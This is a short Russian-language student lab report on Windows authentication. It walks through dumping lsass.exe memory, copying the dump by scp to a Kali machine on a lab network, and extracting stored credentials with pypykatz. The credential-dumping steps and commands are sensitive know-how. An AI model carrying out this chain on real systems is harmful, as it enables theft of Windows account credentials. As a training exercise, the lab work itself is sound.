# Практическая работа №3 ААА в Windows
## Часть 1. Анализ памяти Lsass.exe
### Вход в win10 от имени пользователя Petr

### 1.10 Откроем подробное представление, перейдём в подробности и найдём процесс lsass.exe


### 1.12 Дамп создан. Запомним его расположение

### 1.15 Включим сервис ssh(sudo –i.)(systemctl start ssh)

### Вход в командную строку как и в панель задач от имени администратора

### scp C:\\Users\\ADMpetr\\AppData\\Local\\Temp\\lsass.DMP kali@192.168.10.9:/home/kali(передача файла)

### 1.21 Увидим учетные данные, которые скрипт достал из процесса lsass(pypykatz lsa minidump /home/kali/lsass.DMP- применение скрипта)
